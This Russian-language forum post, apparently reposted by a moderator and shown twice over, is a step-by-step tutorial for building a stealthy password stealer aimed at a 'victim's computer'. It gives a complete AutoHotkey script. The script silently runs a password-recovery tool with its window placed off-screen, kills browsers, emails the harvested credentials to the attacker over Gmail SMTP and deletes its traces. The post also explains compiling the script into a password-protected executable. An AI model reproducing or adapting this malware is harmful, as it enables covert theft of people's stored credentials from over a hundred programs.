lastexile
VIP moderator
- Messages
- 2,033
- Reaction score
- 296
- Points
- 83
Добавлю свои некоторые соображения по поводу воровства паролей.
На многих форумах встречал некие версии вирей, которые тырят пароли с браузеров. При этом они могут "собирать" не со всех браузеров/программ. В большинстве случаев для файла паролей от каждого браузера требуется ещё и софт для расшифровки этих же паролей. Итого получим: трой + пароли не со всех браузеров + программа дешифровщик. Сделаем это проще...
Примерно год назад я повстречал такой язык программирования как автохоткей (ввв.autohotkey.com) Начал заниматься написанием мелких программок. Ещё тогда родилась одна идея снятия паролей с компа жертвы. Итак, приступим! Нам понадобится:
1) Собственно инсталлятор автохоткея(берем на офф сайте) + библиотека CDO(forum.script-coding.info/viewtopic.php?id=3185)
2) Программа мультипассвордрековери последней ПОРТАТИВНОЙ версии(берем тут: passrecovery.com/download.php) - будем называть её пр1
3) Программа мультипассвордрековери крякнутая или с серийником(ищем в гугле) - будем называть её пр2
4) Прямые руки и кривые извилины(у каждого должны быть свои)
Этап 1. Подготавливаем ПР1
Скачали архив с сайта. Распаковываем и видим кучу файлов внутри. Удаляем всё кроме:
а) block_reader.sys
б) HookLib.dll
в) MPR.exe
Готово! Запускаем файл MPR.exe и закрываем. У нас в папке должен появиться файл конфигурации mpr.ini - он то нам и нужен. Открываем его блокнотом и видим:
[default]
WndWidth=ххх - ширина окна
WndHeight=ххх - высота окна
WndLPos=ххх - позиция на экране
WndTPos=ххх - позиция на экране
LeftPane=ххх - хз что
Теперь меняем это всё на:
[default]
WndWidth=118
WndHeight=33
WndLPos=2500
WndTPos=2500
LeftPane=257
Для чего это нужно? А для того, чтобы когда запустили прогу - её небыло на экране.
Теперь создаем на диске каком-то папку какую-то(она нам потом пригодится). К примеру такую - с:\123\ Кидаем в эту папку все наши 4 файла.
Этап 2. Подготовка автохоткей.
Скачали файл с оффсайта. Инсталируем - готово!
Пуск/все программы/автохоткей/ - смотрим что есть.
Создаем скрипт: ЛКМ/создать/автохоткей скрипт Далее открываем блокнотом и удаляем всё. Сохраняем - готово!
Этап 3 - Делаем скрипт.
Что нам надо:
1) Скрипт запускается 1 раз и не запускается более одного раза на машине - чтобы небыло дублей файла паролей.(запускается и проверяет не запускался ли он раньше)
2) Скрипт запускает ПР1 - тот в свою очередь сканирует систему на наличие паролей и сохраняет их в файл.
3) Скрипт берет файл паролей и отправляет их Вам на почту.
Ну вроде не так и сложно, привожу готовый скрипт:
#NoTrayIcon ; Скрываем скрипт из трея
IfExist, C:\Windows\qwe.asd ; Если файл существует
ExitApp ; то выход
else ; иначе
Fileappend ,, C:\Windows\qwe.asd ; создать этот файл
FileCreateDir, C:\windows\333\ ; создаем папку 333
fileinstall C:\123\block_reader.sys , C:\windows\333\block_reader.sys , 1 ; включаем файлы в инсталлятор (откуда брать у вас, куда ложить на компе жертвы, перезапись 1-да 0-нет)
fileinstall C:\123\HookLib.dll , C:\windows\333\HookLib.dll , 1
fileinstall C:\123\MPR.exe , C:\windows\333\MPR.exe , 1
fileinstall C:\123\mpr.ini , C:\windows\333\mpr.ini , 1
SetTitleMatchMode RegEx
Winkill , ahk_class Chrome ; убиваем этот браузер (если он работает то ПР1 может не стянуть пароли)
SetTitleMatchMode RegEx
Winkill , ahk_class Internet Explorer ; че-то он у меня не убивается
runwait C:\windows\333\MPR.exe /export ; запускает файл с параметром и ждет его завершения
FileCopy, C:\windows\333\*.mpf, C:\windows\333\my.mpf ; переименовывает файл паролей в нужный
#include CDO.ahk ; подключаем библиотеку(должна лежать в папке со скриптом)
Tema = %USERNAME% ; тема сообщения(пишем что хотим)
Requisites("от_кого@gmail.com", "кому@mail.ru") ; реквизиты для отправки почты
Options("smtp.gmail.com", "465", "логин", "пароль") ; работает только с почтой гмайл
Investment("C:\windows\333\my.mpf") ; вложения в почту(наш файл)
sSubject := Tema
Send()
Fileremovedir, C:\Windows\333 , 1 ; заметаем следы
ExitApp
Этап 4. Компилируем .ехе
Запускаем пуск/все программы/автохоткей/коверт ахк ту ехе
Выбираем наш скрипт
Выбираем файл в который ОНО сконвертируется
Выбираем иконку
Ставим пароль, если не хотим, чтобы наш файл декомпилировали.
Жмём конвер - готово!
Вот такая простенькая и мощная лабудень стянет пароли более чем от 120 программ.
Ах да, а зачем же нам ПР2? А с помощью её мы и будем смотреть наши файлы у себя на компе.
Автор: patapap
На многих форумах встречал некие версии вирей, которые тырят пароли с браузеров. При этом они могут "собирать" не со всех браузеров/программ. В большинстве случаев для файла паролей от каждого браузера требуется ещё и софт для расшифровки этих же паролей. Итого получим: трой + пароли не со всех браузеров + программа дешифровщик. Сделаем это проще...
Примерно год назад я повстречал такой язык программирования как автохоткей (ввв.autohotkey.com) Начал заниматься написанием мелких программок. Ещё тогда родилась одна идея снятия паролей с компа жертвы. Итак, приступим! Нам понадобится:
1) Собственно инсталлятор автохоткея(берем на офф сайте) + библиотека CDO(forum.script-coding.info/viewtopic.php?id=3185)
2) Программа мультипассвордрековери последней ПОРТАТИВНОЙ версии(берем тут: passrecovery.com/download.php) - будем называть её пр1
3) Программа мультипассвордрековери крякнутая или с серийником(ищем в гугле) - будем называть её пр2
4) Прямые руки и кривые извилины(у каждого должны быть свои)
Этап 1. Подготавливаем ПР1
Скачали архив с сайта. Распаковываем и видим кучу файлов внутри. Удаляем всё кроме:
а) block_reader.sys
б) HookLib.dll
в) MPR.exe
Готово! Запускаем файл MPR.exe и закрываем. У нас в папке должен появиться файл конфигурации mpr.ini - он то нам и нужен. Открываем его блокнотом и видим:
[default]
WndWidth=ххх - ширина окна
WndHeight=ххх - высота окна
WndLPos=ххх - позиция на экране
WndTPos=ххх - позиция на экране
LeftPane=ххх - хз что
Теперь меняем это всё на:
[default]
WndWidth=118
WndHeight=33
WndLPos=2500
WndTPos=2500
LeftPane=257
Для чего это нужно? А для того, чтобы когда запустили прогу - её небыло на экране.
Теперь создаем на диске каком-то папку какую-то(она нам потом пригодится). К примеру такую - с:\123\ Кидаем в эту папку все наши 4 файла.
Этап 2. Подготовка автохоткей.
Скачали файл с оффсайта. Инсталируем - готово!
Пуск/все программы/автохоткей/ - смотрим что есть.
Создаем скрипт: ЛКМ/создать/автохоткей скрипт Далее открываем блокнотом и удаляем всё. Сохраняем - готово!
Этап 3 - Делаем скрипт.
Что нам надо:
1) Скрипт запускается 1 раз и не запускается более одного раза на машине - чтобы небыло дублей файла паролей.(запускается и проверяет не запускался ли он раньше)
2) Скрипт запускает ПР1 - тот в свою очередь сканирует систему на наличие паролей и сохраняет их в файл.
3) Скрипт берет файл паролей и отправляет их Вам на почту.
Ну вроде не так и сложно, привожу готовый скрипт:
#NoTrayIcon ; Скрываем скрипт из трея
IfExist, C:\Windows\qwe.asd ; Если файл существует
ExitApp ; то выход
else ; иначе
Fileappend ,, C:\Windows\qwe.asd ; создать этот файл
FileCreateDir, C:\windows\333\ ; создаем папку 333
fileinstall C:\123\block_reader.sys , C:\windows\333\block_reader.sys , 1 ; включаем файлы в инсталлятор (откуда брать у вас, куда ложить на компе жертвы, перезапись 1-да 0-нет)
fileinstall C:\123\HookLib.dll , C:\windows\333\HookLib.dll , 1
fileinstall C:\123\MPR.exe , C:\windows\333\MPR.exe , 1
fileinstall C:\123\mpr.ini , C:\windows\333\mpr.ini , 1
SetTitleMatchMode RegEx
Winkill , ahk_class Chrome ; убиваем этот браузер (если он работает то ПР1 может не стянуть пароли)
SetTitleMatchMode RegEx
Winkill , ahk_class Internet Explorer ; че-то он у меня не убивается
runwait C:\windows\333\MPR.exe /export ; запускает файл с параметром и ждет его завершения
FileCopy, C:\windows\333\*.mpf, C:\windows\333\my.mpf ; переименовывает файл паролей в нужный
#include CDO.ahk ; подключаем библиотеку(должна лежать в папке со скриптом)
Tema = %USERNAME% ; тема сообщения(пишем что хотим)
Requisites("от_кого@gmail.com", "кому@mail.ru") ; реквизиты для отправки почты
Options("smtp.gmail.com", "465", "логин", "пароль") ; работает только с почтой гмайл
Investment("C:\windows\333\my.mpf") ; вложения в почту(наш файл)
sSubject := Tema
Send()
Fileremovedir, C:\Windows\333 , 1 ; заметаем следы
ExitApp
Этап 4. Компилируем .ехе
Запускаем пуск/все программы/автохоткей/коверт ахк ту ехе
Выбираем наш скрипт
Выбираем файл в который ОНО сконвертируется
Выбираем иконку
Ставим пароль, если не хотим, чтобы наш файл декомпилировали.
Жмём конвер - готово!
Вот такая простенькая и мощная лабудень стянет пароли более чем от 120 программ.
Ах да, а зачем же нам ПР2? А с помощью её мы и будем смотреть наши файлы у себя на компе.
Автор: patapap
